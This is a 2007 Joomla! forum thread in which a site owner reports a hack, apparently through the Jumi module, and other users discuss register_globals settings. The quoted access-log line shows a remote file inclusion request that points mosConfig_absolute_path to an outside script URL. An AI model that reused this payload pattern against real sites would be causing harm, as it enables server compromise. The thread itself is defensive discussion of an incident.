Change font size Change Width
Advanced Search
 

Joomla! Discussion Forums



It is currently Tue Nov 24, 2009 10:19 am (All times are UTC )

 

Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x » 3rd Party/Non Joomla! Security Issues



Post new topic Reply to topic  Page 1 of 1
  [ 3 posts ] 
  Print view Previous topic | Next topic 
Author Message
OskarMaria
 Post subject: Hacked via jumi-module
Posted: Tue Nov 27, 2007 8:45 pm 
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Wed Sep 28, 2005 11:56 am
Posts: 14
Last night my joomla installation (1.0.12) was hacked. The hackers got control via c**.txt script.

I found the following attack in the log-files:
Code:
82.48.**.*** - - [26/Nov/2007:20:55:39 +0100] "GET /mambo/templates/******/images/header.gif HTTP/1.1" 200 6824 "http://www.****.de/mambo/?mosConfig_absolute_path=http://www.selectchile.com/c**.txt??""


After testing all extra components and modules, I think the script got control via the "jumi" module, Version 1.0. I tested version 1.1 too and got the same results.

OskarMaria


Last edited by OskarMaria on Tue Nov 27, 2007 8:58 pm, edited 1 time in total.

Top
  E-mail  
 
RussW
Posted: Wed Nov 28, 2007 3:00 am 
User avatar
Joomla! Champion
Joomla! Champion
Offline

Joined: Sun Oct 22, 2006 4:42 am
Posts: 5286
Location: Queensland, Australia
If you have PHP register_globals or Joomla! RG_EMULATION ON, this style of exploit is possible, turning off these two items and implementing the default Jomla! .htaccess file will assist in stopping this type exploit from being successful.

_________________

** Moved to Queensland** still on/offline intermittantly, will be awhile yet.
Joomla! Tools Suite v2 Beta2 release available at http://joomlacode.org/gf/project/jts/

Top
   
 
OskarMaria
Posted: Wed Nov 28, 2007 3:54 pm 
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Wed Sep 28, 2005 11:56 am
Posts: 14
RussW wrote:
If you have PHP register_globals or Joomla! RG_EMULATION ON, this style of exploit is possible, turning off these two items and implementing the default Jomla! .htaccess file will assist in stopping this type exploit from being successful.


Hi RussW,

thanks for your answer - but in my case I have set both to OFF. These are my settings:
Code:
Relevant PHP Settings:      
Joomla! Register Globals Emulation:    OFF    
Register Globals:    OFF    
Magic Quotes:    ON    
Safe Mode:    OFF    
File Uploads:    ON    
Session auto start:    OFF    


The htaccess settings are not supported by my hoster.
Regards OskarMaria
Top
  E-mail  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 3 posts ] 

Quick reply

 


Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x » 3rd Party/Non Joomla! Security Issues

Who is online

Users browsing this forum: No registered users and 6 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
 
 
 
 
 

© 2005-2009 Open Source Matters, Inc. All rights reserved. Joomla hosting by Rochen Ltd.